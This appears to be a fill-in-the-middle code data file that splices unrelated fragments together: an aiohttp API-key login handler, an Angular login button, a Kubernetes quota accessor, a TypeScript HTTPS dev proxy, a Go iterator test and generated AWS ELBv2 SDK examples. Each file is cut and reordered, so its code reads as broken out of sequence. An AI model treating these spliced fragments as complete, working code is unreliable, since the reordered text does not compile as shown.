return aiohttp.web.FileResponse(os.path.join(os.path.dirname(os.path.realpath(__file__)),'html/login_noaccount.html'))
async def | (self, request):
data = await request.post()
#check for apikey field
if 'apikey' not in data:
raise aiohttp.web.HTTPFound('/login_baddata')
#process authentication
auth_result = None
try:
auth_result = await self.__gw2api.do_auth_apikey(data['apikey'])
except Exception:
self._logger.exception("exception on doing auth:")
raise aiohttp.web.HTTPFound('/login_baddata')
if auth_result == GW2AuthorizationResult.FINISHED:
raise aiohttp.web.HTTPFound('/finished')
elif auth_result == GW2AuthorizationResult.FAILED_NO_ACCOUNT:
raise aiohttp.web.HTTPFound('/login_noaccount')
elif auth_result == GW2AuthorizationResult.FAILED_BAD_DATA:
raise aiohttp.web.HTTPFound('/login_baddata')
else:
raise aiohttp.web.HTTPFound('/login_failed')
raise aiohttp.web.HTTPFound('/login_failed')
| handle_login_post |
login-button.component.ts | import { Component, OnInit } from '@angular/core';
@Component({
selector: 'cvc-login-button',
templateUrl: './login-button.component.html',
styleUrls: ['./login-button.component.less']
})
export class | implements OnInit {
authVisible: boolean;
constructor() {
this.authVisible = false;
}
ngOnInit(): void {
}
showAuth(): void {
this.authVisible = true;
}
handleCancel(): void {
this.authVisible = false;
}
}
| CvcLoginButtonComponent |
resource_access.go | /*
Copyright 2016 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package resourcequota
import (
"fmt"
"time"
"github.com/hashicorp/golang-lru"
corev1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/labels"
"k8s.io/apiserver/pkg/storage/etcd"
"k8s.io/client-go/kubernetes"
corev1listers "k8s.io/client-go/listers/core/v1"
)
// QuotaAccessor abstracts the get/set logic from the rest of the Evaluator. This could be a test stub, a straight passthrough,
// or most commonly a series of deconflicting caches.
type QuotaAccessor interface {
// UpdateQuotaStatus is called to persist final status. This method should write to persistent storage.
// An error indicates that write didn't complete successfully.
UpdateQuotaStatus(newQuota *corev1.ResourceQuota) error
// GetQuotas gets all possible quotas for a given namespace
GetQuotas(namespace string) ([]corev1.ResourceQuota, error)
}
type quotaAccessor struct {
client kubernetes.Interface
// lister can list/get quota objects from a shared informer's cache
lister corev1listers.ResourceQuotaLister
// liveLookups holds the last few live lookups we've done to help ammortize cost on repeated lookup failures.
// This lets us handle the case of latent caches, by looking up actual results for a namespace on cache miss/no results.
// We track the lookup result here so that for repeated requests, we don't look it up very often.
liveLookupCache *lru.Cache
liveTTL time.Duration
// updatedQuotas holds a cache of quotas that we've updated. This is used to pull the "really latest" during back to
// back quota evaluations that touch the same quota doc. This only works because we can compare etcd resourceVersions
// for the same resource as integers. Before this change: 22 updates with 12 conflicts. after this change: 15 updates with 0 conflicts
updatedQuotas *lru.Cache
}
// newQuotaAccessor creates an object that conforms to the QuotaAccessor interface to be used to retrieve quota objects.
func newQuotaAccessor() (*quotaAccessor, error) {
liveLookupCache, err := lru.New(100)
if err != nil {
return nil, err
}
updatedCache, err := lru.New(100)
if err != nil {
return nil, err
}
// client and lister will be set when SetInternalKubeClientSet and SetInternalKubeInformerFactory are invoked
return "aAccessor{
liveLookupCache: liveLookupCache,
liveTTL: time.Duration(30 * time.Second),
updatedQuotas: updatedCache,
}, nil
}
func (e *quotaAccessor) UpdateQuotaStatus(newQuota *corev1.ResourceQuota) error {
updatedQuota, err := e.client.CoreV1().ResourceQuotas(newQuota.Namespace).UpdateStatus(newQuota)
if err != nil {
return err
}
key := newQuota.Namespace + "/" + newQuota.Name
e.updatedQuotas.Add(key, updatedQuota)
return nil
}
var etcdVersioner = etcd.APIObjectVersioner{}
// checkCache compares the passed quota against the value in the look-aside cache and returns the newer
// if the cache is out of date, it deletes the stale entry. This only works because of etcd resourceVersions
// being monotonically increasing integers
func (e *quotaAccessor) checkCache(quota *corev1.ResourceQuota) *corev1.ResourceQuota {
key := quota.Namespace + "/" + quota.Name
uncastCachedQuota, ok := e.updatedQuotas.Get(key)
if !ok {
return quota
}
cachedQuota := uncastCachedQuota.(*corev1.ResourceQuota) | }
return cachedQuota
}
func (e *quotaAccessor) GetQuotas(namespace string) ([]corev1.ResourceQuota, error) {
// determine if there are any quotas in this namespace
// if there are no quotas, we don't need to do anything
items, err := e.lister.ResourceQuotas(namespace).List(labels.Everything())
if err != nil {
return nil, fmt.Errorf("error resolving quota: %v", err)
}
// if there are no items held in our indexer, check our live-lookup LRU, if that misses, do the live lookup to prime it.
if len(items) == 0 {
lruItemObj, ok := e.liveLookupCache.Get(namespace)
if !ok || lruItemObj.(liveLookupEntry).expiry.Before(time.Now()) {
// TODO: If there are multiple operations at the same time and cache has just expired,
// this may cause multiple List operations being issued at the same time.
// If there is already in-flight List() for a given namespace, we should wait until
// it is finished and cache is updated instead of doing the same, also to avoid
// throttling - see #22422 for details.
liveList, err := e.client.Core().ResourceQuotas(namespace).List(metav1.ListOptions{})
if err != nil {
return nil, err
}
newEntry := liveLookupEntry{expiry: time.Now().Add(e.liveTTL)}
for i := range liveList.Items {
newEntry.items = append(newEntry.items, &liveList.Items[i])
}
e.liveLookupCache.Add(namespace, newEntry)
lruItemObj = newEntry
}
lruEntry := lruItemObj.(liveLookupEntry)
for i := range lruEntry.items {
items = append(items, lruEntry.items[i])
}
}
resourceQuotas := []corev1.ResourceQuota{}
for i := range items {
quota := items[i]
quota = e.checkCache(quota)
// always make a copy. We're going to muck around with this and we should never mutate the originals
resourceQuotas = append(resourceQuotas, *quota)
}
return resourceQuotas, nil
} |
if etcdVersioner.CompareResourceVersion(quota, cachedQuota) >= 0 {
e.updatedQuotas.Remove(key)
return quota |
index.ts | // inspired by https://github.com/song940/kelp-static/blob/express/index.js
// this proxy assumes you have codap, building-models and cloud-file-manager all checked out in sibling folders to sage-modeler-site
// the proxy exists to load CODAP, Sage and CFM all with the same domain so cross-iframe communication works as it does in production
// were the same proxy is accomplished using CloudFront behaviors.
import * as http from "http";
import * as https from "https";
import * as fs from "fs";
import * as path from "path";
import * as url from "url";
import * as mime from "mime2";
import * as httpProxy from "http-proxy";
const config = {
port: 10000,
endpoints: {
codap: path.normalize(`${__dirname}/../../../codap/dist/travis/`),
sage: path.normalize(`${__dirname}/../../../building-models/dev/`),
cfm: path.normalize(`${__dirname}/../../../cloud-file-manager/dist/`),
}
};
// used to proxy requests to webpack-devserver
const proxy = httpProxy.createProxyServer(); |
// looks up a file within an endpoint
const findFile = (req: http.IncomingMessage, res: http.ServerResponse, endpoint: string, callback: (code: number, err?: string) => void) => {
const pathname = url.parse(req.url || "").pathname || "";
let filename = path.join(endpoint, pathname);
if (filename.indexOf(endpoint) !== 0) {
return callback(404, `File not found: ${filename}`);
}
if (filename.endsWith("/") || filename.endsWith("\\")) {
filename += "index.html";
}
serveFile(req, res, filename, callback);
};
// serves the file or a directory listing
const serveFile = (req: http.IncomingMessage, res: http.ServerResponse, filename: string, callback: (code: number, err?: string) => void) => {
fs.stat(filename, (err, stat) => {
if (err) {
return callback(404, err.toString());
}
if (stat.isDirectory()) {
return serveDirectory(filename, filename, res);
}
const mtime = new Date(stat.mtimeMs).toUTCString();
if (req.headers["if-modified-since"] === mtime) {
res.writeHead(304);
return res.end();
}
const type = mime.lookup(filename);
const charset = /^text\/|^application\/(javascript|json)/.test(type) ? "UTF-8" : false;
res.setHeader("Last-Modified", mtime);
res.setHeader("Content-Length", stat.size);
res.setHeader("Content-Type", type + (charset ? "; charset=" + charset : ""));
fs.createReadStream(filename).pipe(res);
});
};
// serves a directory listing
const serveDirectory = (cwd: string, dir: string, res: http.ServerResponse) => {
let content = `<h1>Index of ${dir.replace(cwd, "")}</h1><hr />`;
fs.readdir(dir, (err, files) => {
content += "<table width=\"50%\">";
content += "<tr>";
content += "<td><a href=\"..\">../</a></td>";
content += "</tr>";
files.map((filename) => {
const stat = fs.statSync(path.join(dir, filename));
filename = filename + (stat.isDirectory() ? "/" : "");
content += "<tr>";
content += `<td><a href="${filename}">${filename}</a></td>`;
content += `<td>${(stat.mtime || "-")}</td>`;
content += `<td>${(stat.size)}</td>`;
content += "</tr>";
}).join("");
content += "</table></hr>";
res.setHeader("Content-Type", "text/html");
res.end(content);
});
};
// main server
const options: https.ServerOptions = {
key: fs.readFileSync(`${__dirname}/devproxy.key`),
cert: fs.readFileSync(`${__dirname}/devproxy.crt`)
};
const server = https.createServer(options, (req, res) => {
const done = (code, err) => {
if (code !== 200) {
res.statusCode = code;
res.write(err || "Unknown error");
res.end();
}
};
const reqUrl = req.url || "";
console.log(new Date(), reqUrl);
const pathname = url.parse(reqUrl).pathname || "";
// codap does not build the index.html file in travis/dist so a local copy is used
if (pathname === "/codap/static/dg/en/cert/index.html") {
const filename = path.normalize(`${__dirname}/codap-index.html`);
serveFile(req, res, filename, done);
} else {
// look to see if the path starts with one of our endpoint folders
const match = reqUrl.match(endpointRegex);
const endpoint = match ? config.endpoints[match[1]] : undefined;
if (endpoint) {
req.url = reqUrl.replace(endpointRegex, "/");
findFile(req, res, endpoint, done);
} else {
// proxy to webpack-devserver
proxy.web(req, res, { target: "https://localhost:10001", secure: false }, (err) => {
res.statusCode = 500;
res.write(err.toString());
res.end();
});
}
}
});
console.log(`Listening on port ${config.port}`);
server.listen(config.port); |
const endpoints = Object.keys(config.endpoints);
const regexString = `^/(${endpoints.join("|")})`;
const endpointRegex = new RegExp(regexString); |
iterator_test.go | package iterator
import (
"fmt"
"testing"
)
func TestIterator(t *testing.T) | {
// 实现带快照的迭代器
vector := NewVector()
iter := NewIterator(vector)
for i := 0; i < 20; i++ {
vector.Add(i)
}
iter.Init()
vector.Remove(0)
vector.Remove(11)
vector.Add(100)
for iter.hasNext() {
fmt.Printf("%v\t", iter.currentItem())
}
fmt.Println()
fmt.Println("========================================")
iter.Init()
for iter.hasNext() {
fmt.Printf("%v\t", iter.currentItem())
}
fmt.Println()
}
|
|
examples_test.go | // Code generated by private/model/cli/gen-api/main.go. DO NOT EDIT.
package elbv2_test
import (
"fmt"
"strings"
"time"
"github.com/Beeketing/aws-sdk-go/aws"
"github.com/Beeketing/aws-sdk-go/aws/awserr"
"github.com/Beeketing/aws-sdk-go/aws/session"
"github.com/Beeketing/aws-sdk-go/service/elbv2"
)
var _ time.Duration
var _ strings.Reader
var _ aws.Config
func parseTime(layout, value string) *time.Time {
t, err := time.Parse(layout, value)
if err != nil {
panic(err)
}
return &t
}
// To add tags to a load balancer
//
// This example adds the specified tags to the specified load balancer.
func ExampleELBV2_AddTags_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.AddTagsInput{
ResourceArns: []*string{
aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
},
Tags: []*elbv2.Tag{
{
Key: aws.String("project"),
Value: aws.String("lima"),
},
{
Key: aws.String("department"),
Value: aws.String("digital-media"),
},
},
}
result, err := svc.AddTags(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeDuplicateTagKeysException:
fmt.Println(elbv2.ErrCodeDuplicateTagKeysException, aerr.Error())
case elbv2.ErrCodeTooManyTagsException:
fmt.Println(elbv2.ErrCodeTooManyTagsException, aerr.Error())
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To create an HTTP listener
//
// This example creates an HTTP listener for the specified load balancer that forwards
// requests to the specified target group.
func ExampleELBV2_CreateListener_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.CreateListenerInput{
DefaultActions: []*elbv2.Action{
{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
Type: aws.String("forward"),
},
},
LoadBalancerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
Port: aws.Int64(80),
Protocol: aws.String("HTTP"),
}
result, err := svc.CreateListener(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeDuplicateListenerException:
fmt.Println(elbv2.ErrCodeDuplicateListenerException, aerr.Error())
case elbv2.ErrCodeTooManyListenersException:
fmt.Println(elbv2.ErrCodeTooManyListenersException, aerr.Error())
case elbv2.ErrCodeTooManyCertificatesException:
fmt.Println(elbv2.ErrCodeTooManyCertificatesException, aerr.Error())
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupAssociationLimitException:
fmt.Println(elbv2.ErrCodeTargetGroupAssociationLimitException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
case elbv2.ErrCodeIncompatibleProtocolsException:
fmt.Println(elbv2.ErrCodeIncompatibleProtocolsException, aerr.Error())
case elbv2.ErrCodeSSLPolicyNotFoundException:
fmt.Println(elbv2.ErrCodeSSLPolicyNotFoundException, aerr.Error())
case elbv2.ErrCodeCertificateNotFoundException:
fmt.Println(elbv2.ErrCodeCertificateNotFoundException, aerr.Error())
case elbv2.ErrCodeUnsupportedProtocolException:
fmt.Println(elbv2.ErrCodeUnsupportedProtocolException, aerr.Error())
case elbv2.ErrCodeTooManyRegistrationsForTargetIdException:
fmt.Println(elbv2.ErrCodeTooManyRegistrationsForTargetIdException, aerr.Error())
case elbv2.ErrCodeTooManyTargetsException:
fmt.Println(elbv2.ErrCodeTooManyTargetsException, aerr.Error())
case elbv2.ErrCodeTooManyActionsException:
fmt.Println(elbv2.ErrCodeTooManyActionsException, aerr.Error())
case elbv2.ErrCodeInvalidLoadBalancerActionException:
fmt.Println(elbv2.ErrCodeInvalidLoadBalancerActionException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To create an HTTPS listener
//
// This example creates an HTTPS listener for the specified load balancer that forwards
// requests to the specified target group. Note that you must specify an SSL certificate
// for an HTTPS listener. You can create and manage certificates using AWS Certificate
// Manager (ACM). Alternatively, you can create a certificate using SSL/TLS tools, get
// the certificate signed by a certificate authority (CA), and upload the certificate
// to AWS Identity and Access Management (IAM).
func ExampleELBV2_CreateListener_shared01() {
svc := elbv2.New(session.New())
input := &elbv2.CreateListenerInput{
Certificates: []*elbv2.Certificate{
{
CertificateArn: aws.String("arn:aws:iam::123456789012:server-certificate/my-server-cert"),
},
},
DefaultActions: []*elbv2.Action{
{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
Type: aws.String("forward"),
},
},
LoadBalancerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
Port: aws.Int64(443),
Protocol: aws.String("HTTPS"),
SslPolicy: aws.String("ELBSecurityPolicy-2015-05"),
}
result, err := svc.CreateListener(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeDuplicateListenerException:
fmt.Println(elbv2.ErrCodeDuplicateListenerException, aerr.Error())
case elbv2.ErrCodeTooManyListenersException:
fmt.Println(elbv2.ErrCodeTooManyListenersException, aerr.Error())
case elbv2.ErrCodeTooManyCertificatesException:
fmt.Println(elbv2.ErrCodeTooManyCertificatesException, aerr.Error())
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupAssociationLimitException:
fmt.Println(elbv2.ErrCodeTargetGroupAssociationLimitException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
case elbv2.ErrCodeIncompatibleProtocolsException:
fmt.Println(elbv2.ErrCodeIncompatibleProtocolsException, aerr.Error())
case elbv2.ErrCodeSSLPolicyNotFoundException:
fmt.Println(elbv2.ErrCodeSSLPolicyNotFoundException, aerr.Error())
case elbv2.ErrCodeCertificateNotFoundException:
fmt.Println(elbv2.ErrCodeCertificateNotFoundException, aerr.Error())
case elbv2.ErrCodeUnsupportedProtocolException:
fmt.Println(elbv2.ErrCodeUnsupportedProtocolException, aerr.Error())
case elbv2.ErrCodeTooManyRegistrationsForTargetIdException:
fmt.Println(elbv2.ErrCodeTooManyRegistrationsForTargetIdException, aerr.Error())
case elbv2.ErrCodeTooManyTargetsException:
fmt.Println(elbv2.ErrCodeTooManyTargetsException, aerr.Error())
case elbv2.ErrCodeTooManyActionsException:
fmt.Println(elbv2.ErrCodeTooManyActionsException, aerr.Error())
case elbv2.ErrCodeInvalidLoadBalancerActionException:
fmt.Println(elbv2.ErrCodeInvalidLoadBalancerActionException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To create an Internet-facing load balancer
//
// This example creates an Internet-facing load balancer and enables the Availability
// Zones for the specified subnets.
func ExampleELBV2_CreateLoadBalancer_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.CreateLoadBalancerInput{
Name: aws.String("my-load-balancer"),
Subnets: []*string{
aws.String("subnet-b7d581c0"),
aws.String("subnet-8360a9e7"),
},
}
result, err := svc.CreateLoadBalancer(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeDuplicateLoadBalancerNameException:
fmt.Println(elbv2.ErrCodeDuplicateLoadBalancerNameException, aerr.Error())
case elbv2.ErrCodeTooManyLoadBalancersException:
fmt.Println(elbv2.ErrCodeTooManyLoadBalancersException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
case elbv2.ErrCodeSubnetNotFoundException:
fmt.Println(elbv2.ErrCodeSubnetNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidSubnetException:
fmt.Println(elbv2.ErrCodeInvalidSubnetException, aerr.Error())
case elbv2.ErrCodeInvalidSecurityGroupException:
fmt.Println(elbv2.ErrCodeInvalidSecurityGroupException, aerr.Error())
case elbv2.ErrCodeInvalidSchemeException:
fmt.Println(elbv2.ErrCodeInvalidSchemeException, aerr.Error())
case elbv2.ErrCodeTooManyTagsException:
fmt.Println(elbv2.ErrCodeTooManyTagsException, aerr.Error())
case elbv2.ErrCodeDuplicateTagKeysException:
fmt.Println(elbv2.ErrCodeDuplicateTagKeysException, aerr.Error())
case elbv2.ErrCodeResourceInUseException:
fmt.Println(elbv2.ErrCodeResourceInUseException, aerr.Error())
case elbv2.ErrCodeAllocationIdNotFoundException:
fmt.Println(elbv2.ErrCodeAllocationIdNotFoundException, aerr.Error())
case elbv2.ErrCodeAvailabilityZoneNotSupportedException:
fmt.Println(elbv2.ErrCodeAvailabilityZoneNotSupportedException, aerr.Error())
case elbv2.ErrCodeOperationNotPermittedException:
fmt.Println(elbv2.ErrCodeOperationNotPermittedException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To create an internal load balancer
//
// This example creates an internal load balancer and enables the Availability Zones
// for the specified subnets.
func ExampleELBV2_CreateLoadBalancer_shared01() {
svc := elbv2.New(session.New())
input := &elbv2.CreateLoadBalancerInput{
Name: aws.String("my-internal-load-balancer"),
Scheme: aws.String("internal"),
Subnets: []*string{
aws.String("subnet-b7d581c0"),
aws.String("subnet-8360a9e7"),
},
}
result, err := svc.CreateLoadBalancer(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeDuplicateLoadBalancerNameException:
fmt.Println(elbv2.ErrCodeDuplicateLoadBalancerNameException, aerr.Error())
case elbv2.ErrCodeTooManyLoadBalancersException:
fmt.Println(elbv2.ErrCodeTooManyLoadBalancersException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
case elbv2.ErrCodeSubnetNotFoundException:
fmt.Println(elbv2.ErrCodeSubnetNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidSubnetException:
fmt.Println(elbv2.ErrCodeInvalidSubnetException, aerr.Error())
case elbv2.ErrCodeInvalidSecurityGroupException:
fmt.Println(elbv2.ErrCodeInvalidSecurityGroupException, aerr.Error())
case elbv2.ErrCodeInvalidSchemeException:
fmt.Println(elbv2.ErrCodeInvalidSchemeException, aerr.Error())
case elbv2.ErrCodeTooManyTagsException:
fmt.Println(elbv2.ErrCodeTooManyTagsException, aerr.Error())
case elbv2.ErrCodeDuplicateTagKeysException:
fmt.Println(elbv2.ErrCodeDuplicateTagKeysException, aerr.Error())
case elbv2.ErrCodeResourceInUseException:
fmt.Println(elbv2.ErrCodeResourceInUseException, aerr.Error())
case elbv2.ErrCodeAllocationIdNotFoundException:
fmt.Println(elbv2.ErrCodeAllocationIdNotFoundException, aerr.Error())
case elbv2.ErrCodeAvailabilityZoneNotSupportedException:
fmt.Println(elbv2.ErrCodeAvailabilityZoneNotSupportedException, aerr.Error())
case elbv2.ErrCodeOperationNotPermittedException:
fmt.Println(elbv2.ErrCodeOperationNotPermittedException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To create a rule
//
// This example creates a rule that forwards requests to the specified target group
// if the URL contains the specified pattern (for example, /img/*).
func ExampleELBV2_CreateRule_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.CreateRuleInput{
Actions: []*elbv2.Action{
{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
Type: aws.String("forward"),
},
},
Conditions: []*elbv2.RuleCondition{
{
Field: aws.String("path-pattern"),
Values: []*string{
aws.String("/img/*"),
},
},
},
ListenerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:listener/app/my-load-balancer/50dc6c495c0c9188/f2f7dc8efc522ab2"),
Priority: aws.Int64(10),
}
result, err := svc.CreateRule(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodePriorityInUseException:
fmt.Println(elbv2.ErrCodePriorityInUseException, aerr.Error())
case elbv2.ErrCodeTooManyTargetGroupsException:
fmt.Println(elbv2.ErrCodeTooManyTargetGroupsException, aerr.Error())
case elbv2.ErrCodeTooManyRulesException:
fmt.Println(elbv2.ErrCodeTooManyRulesException, aerr.Error())
case elbv2.ErrCodeTargetGroupAssociationLimitException:
fmt.Println(elbv2.ErrCodeTargetGroupAssociationLimitException, aerr.Error())
case elbv2.ErrCodeIncompatibleProtocolsException:
fmt.Println(elbv2.ErrCodeIncompatibleProtocolsException, aerr.Error())
case elbv2.ErrCodeListenerNotFoundException:
fmt.Println(elbv2.ErrCodeListenerNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
case elbv2.ErrCodeTooManyRegistrationsForTargetIdException:
fmt.Println(elbv2.ErrCodeTooManyRegistrationsForTargetIdException, aerr.Error())
case elbv2.ErrCodeTooManyTargetsException:
fmt.Println(elbv2.ErrCodeTooManyTargetsException, aerr.Error())
case elbv2.ErrCodeUnsupportedProtocolException:
fmt.Println(elbv2.ErrCodeUnsupportedProtocolException, aerr.Error())
case elbv2.ErrCodeTooManyActionsException:
fmt.Println(elbv2.ErrCodeTooManyActionsException, aerr.Error())
case elbv2.ErrCodeInvalidLoadBalancerActionException:
fmt.Println(elbv2.ErrCodeInvalidLoadBalancerActionException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To create a target group
//
// This example creates a target group that you can use to route traffic to targets
// using HTTP on port 80. This target group uses the default health check configuration.
func ExampleELBV2_CreateTargetGroup_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.CreateTargetGroupInput{
Name: aws.String("my-targets"),
Port: aws.Int64(80),
Protocol: aws.String("HTTP"),
VpcId: aws.String("vpc-3ac0fb5f"),
}
result, err := svc.CreateTargetGroup(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeDuplicateTargetGroupNameException:
fmt.Println(elbv2.ErrCodeDuplicateTargetGroupNameException, aerr.Error())
case elbv2.ErrCodeTooManyTargetGroupsException:
fmt.Println(elbv2.ErrCodeTooManyTargetGroupsException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To delete a listener
//
// This example deletes the specified listener.
func ExampleELBV2_DeleteListener_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DeleteListenerInput{
ListenerArn: aws.String("arn:aws:elasticloadbalancing:ua-west-2:123456789012:listener/app/my-load-balancer/50dc6c495c0c9188/f2f7dc8efc522ab2"),
}
result, err := svc.DeleteListener(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeListenerNotFoundException:
fmt.Println(elbv2.ErrCodeListenerNotFoundException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To delete a load balancer
//
// This example deletes the specified load balancer.
func ExampleELBV2_DeleteLoadBalancer_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DeleteLoadBalancerInput{
LoadBalancerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
}
result, err := svc.DeleteLoadBalancer(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeOperationNotPermittedException:
fmt.Println(elbv2.ErrCodeOperationNotPermittedException, aerr.Error())
case elbv2.ErrCodeResourceInUseException:
fmt.Println(elbv2.ErrCodeResourceInUseException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To delete a rule
//
// This example deletes the specified rule.
func ExampleELBV2_DeleteRule_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DeleteRuleInput{
RuleArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:listener-rule/app/my-load-balancer/50dc6c495c0c9188/f2f7dc8efc522ab2/1291d13826f405c3"),
}
result, err := svc.DeleteRule(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeRuleNotFoundException:
fmt.Println(elbv2.ErrCodeRuleNotFoundException, aerr.Error())
case elbv2.ErrCodeOperationNotPermittedException:
fmt.Println(elbv2.ErrCodeOperationNotPermittedException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To delete a target group
//
// This example deletes the specified target group.
func ExampleELBV2_DeleteTargetGroup_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DeleteTargetGroupInput{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
}
result, err := svc.DeleteTargetGroup(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeResourceInUseException:
fmt.Println(elbv2.ErrCodeResourceInUseException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To deregister a target from a target group
//
// This example deregisters the specified instance from the specified target group.
func ExampleELBV2_DeregisterTargets_shared00() {
